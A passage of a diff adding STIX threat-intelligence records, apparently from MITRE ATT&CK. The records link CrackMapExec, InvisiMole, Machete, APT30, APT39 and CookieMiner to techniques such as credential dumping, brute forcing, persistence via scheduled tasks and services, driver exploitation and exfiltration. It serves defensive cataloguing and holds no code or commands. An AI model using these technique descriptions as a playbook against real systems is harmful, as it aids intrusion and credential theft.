"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can set a scheduled task on the target system to execute commands remotely using [at](https://attack.mitre.org/software/S0110).(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--54b3abf5-bc7c-4e8a-b51d-058cc313a3c9", + "type": "relationship", + "modified": "2020-07-29T20:01:03.103Z", + "created": "2020-07-17T15:48:51.566Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords from LSA secrets for the targeted system.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--7644ad2b-1ee7-43f4-9b06-9928f6f9eb1a", + "type": "relationship", + "modified": "2020-07-29T20:01:03.110Z", + "created": "2020-07-17T15:48:51.571Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force supplied user credentials across a network range.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--fb0a3153-dbd8-4f32-8583-6a7e2fade337", + "type": "relationship", + "modified": "2020-07-29T20:01:03.083Z", + "created": "2020-07-17T15:48:51.575Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can discover specified filetypes and log files on a targeted system.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--b37173c1-b29d-4a95-b79c-787b1acab673", + "type": "relationship", + "modified": "2020-07-29T20:01:03.106Z", + "created": "2020-07-17T15:48:51.579Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force credential authentication by using a supplied list of usernames and a single password.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--11027c06-b55a-4b0f-957c-f9f67daf21a7", + "type": "relationship", + "modified": "2020-07-29T20:01:03.036Z", + "created": "2020-07-17T15:48:51.587Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can discover the password policies applied to the target system.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--11ca4266-5fca-4be4-9bce-275c655c66bd", + "type": "relationship", + "modified": "2020-07-29T20:01:03.045Z", + "created": "2020-07-17T15:48:51.591Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the domain user accounts on a targeted system.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--182ae728-bd77-41ca-bd0d-dd2b3d6cf50b", + "type": "relationship", + "modified": "2020-07-29T20:01:03.097Z", + "created": "2020-07-17T15:48:51.600Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can dump usernames and hashed passwords from the SAM.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--099cdf98-eece-47a5-821f-f29b866699d6", + "type": "relationship", + "modified": "2020-07-29T20:01:03.108Z", + "created": "2020-07-17T15:48:51.657Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active sessions for a targeted system.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--2e661579-5e24-486f-9c8e-624fb18b0b85", + "type": "relationship", + "modified": "2020-07-29T20:01:03.102Z", + "created": "2020-07-17T15:48:51.663Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active IP addresses, along with the machine name, within a targeted network.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--63b477c5-b88b-469d-8b2a-bc30507de54f", + "type": "relationship", + "modified": "2020-07-29T20:01:03.048Z", + "created": "2020-07-17T15:48:51.667Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80", + "target_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "external_references": [ + { + "source_name": "FireEye APT39 Jan 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019." + }, + { + "source_name": "BitDefender Chafer May 2020", + "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/", + "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020." + } + ], + "description": "(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)", + "relationship_type": "uses", + "id": "relationship--37fee9dc-701e-49be-8cec-b2fde4b533d8", + "type": "relationship", + "modified": "2020-07-29T20:16:15.040Z", + "created": "2020-07-17T15:58:56.120Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can register itself for execution and persistence via the Control Panel.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--6cef3b8e-24de-41f0-b568-531211e0268a", + "type": "relationship", + "modified": "2020-08-18T13:13:31.794Z", + "created": "2020-07-17T16:03:27.012Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has executed legitimate tools in hidden windows.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--cc1a0331-2b30-489c-ab4d-8853cff3a0b0", + "type": "relationship", + "modified": "2020-08-18T13:13:31.826Z", + "created": "2020-07-17T16:57:12.320Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--fa27f615-56c5-4089-bcda-657999868e53", + "type": "relationship", + "modified": "2020-08-17T14:08:27.413Z", + "created": "2020-07-17T17:34:21.437Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use the ITaskService, ITaskDefinition and ITaskSettings COM interfaces to schedule a task.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--2cae8d8d-e0de-4793-9acf-d21508189bf9", + "type": "relationship", + "modified": "2020-08-17T15:22:30.401Z", + "created": "2020-07-17T17:34:21.496Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--0ab3b4aa-55d9-44bb-8563-d7e614641d5a", + "type": "relationship", + "modified": "2020-10-21T17:45:35.411Z", + "created": "2020-07-17T17:34:21.504Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has used scheduled tasks named MSST and \\Microsoft\\Windows\\Autochk\\Scheduled to establish persistence.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--e19d37dd-2cee-488b-a05e-1d298eb090cf", + "type": "relationship", + "modified": "2020-08-17T14:37:44.922Z", + "created": "2020-07-17T17:34:21.510Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use winapiexec tool for indirect execution of ShellExecuteW and CreateProcessA.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--fd93333d-ec77-4f0d-be90-64860d67bdf5", + "type": "relationship", + "modified": "2020-08-18T13:13:31.950Z", + "created": "2020-07-17T19:22:28.414Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can create hidden system directories.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--6390419e-ebaa-4556-ae74-c92dc041eb47", + "type": "relationship", + "modified": "2020-07-17T19:22:28.403Z", + "created": "2020-07-17T19:22:28.403Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate windows and child windows on a compromised host.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--47ba2c60-f295-4a91-bcd1-ac17292f4e7e", + "type": "relationship", + "modified": "2020-10-21T17:38:02.687Z", + "created": "2020-07-17T20:14:44.179Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--9aeb640c-a961-4694-a965-349b4d70b8ee", + "type": "relationship", + "modified": "2020-08-18T13:13:32.050Z", + "created": "2020-07-17T20:14:44.219Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--64fe312b-e489-4698-9924-aeb22c056e2b", + "type": "relationship", + "modified": "2020-07-20T13:25:54.617Z", + "created": "2020-07-20T13:25:54.617Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has been configured with several servers available for alternate C2 communications.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--1f728f8c-8aee-4d40-9161-1cae773983d1", + "type": "relationship", + "modified": "2020-10-21T17:38:02.728Z", + "created": "2020-07-20T13:25:54.607Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", + "target_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "external_references": [ + { + "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.", + "url": "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html", + "source_name": "Cylance Machete Mar 2017" + } + ], + "description": "[Machete](https://attack.mitre.org/groups/G0095) has used free dynamic DNS domains for C2.(Citation: Cylance Machete Mar 2017)", + "relationship_type": "uses", + "id": "relationship--f5bde9a2-b753-4fac-955a-6dcb541b412d", + "type": "relationship", + "modified": "2020-07-21T18:31:54.336Z", + "created": "2020-07-21T18:31:54.336Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--35cd1d01-1ede-44d2-b073-a264d727bc04", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "external_references": [ + { + "source_name": "ESET Machete July 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf", + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019." + } + ], + "description": "[Machete](https://attack.mitre.org/software/S0409) has used AES to exfiltrate documents.(Citation: ESET Machete July 2019)", + "relationship_type": "uses", + "id": "relationship--140046d6-8cb6-4a09-bd74-fd7696ac4247", + "type": "relationship", + "modified": "2020-07-21T18:56:44.925Z", + "created": "2020-07-21T18:56:44.925Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--35cd1d01-1ede-44d2-b073-a264d727bc04", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "external_references": [ + { + "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.", + "url": "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html", + "source_name": "Cylance Machete Mar 2017" + } + ], + "description": "[Machete](https://attack.mitre.org/software/S0409) has used TLS-encrypted FTP to exfiltrate data.(Citation: Cylance Machete Mar 2017)", + "relationship_type": "uses", + "id": "relationship--a2ed58c0-7bd3-4a94-99b3-f2ff94dea408", + "type": "relationship", + "modified": "2020-07-21T18:56:44.940Z", + "created": "2020-07-21T18:56:44.940Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--f047ee18-7985-4946-8bfb-4ed754d3a0dd", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "description": "FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.", + "source_name": "FireEye APT30" + } + ], + "description": "[APT30](https://attack.mitre.org/groups/G0013) has relied on users to execute malicious file attachments delivered via spearphishing emails.(Citation: FireEye APT30)", + "relationship_type": "uses", + "id": "relationship--bfc4c5dd-a02a-42a0-8838-1e9b45c1dd7e", + "type": "relationship", + "modified": "2020-07-21T19:02:06.341Z", + "created": "2020-07-21T19:02:06.341Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--f047ee18-7985-4946-8bfb-4ed754d3a0dd", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "description": "FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.", + "source_name": "FireEye APT30" + } + ], + "description": "[APT30](https://attack.mitre.org/groups/G0013) has used spearphishing emails with malicious DOC attachments.(Citation: FireEye APT30)", + "relationship_type": "uses", + "id": "relationship--862470eb-b43a-42d9-ab06-4ca6fbc3671d", + "type": "relationship", + "modified": "2020-07-21T19:02:06.344Z", + "created": "2020-07-21T19:02:06.344Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has used base64 encoding to obfuscate scripts on the system.(Citation: Unit42 CookieMiner Jan 2019) ", + "relationship_type": "uses", + "id": "relationship--d3142001-8501-474a-a0cd-2e12bba52148", + "type": "relationship", + "modified": "2020-07-22T19:16:02.845Z", + "created": "2020-07-22T19:16:02.845Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency 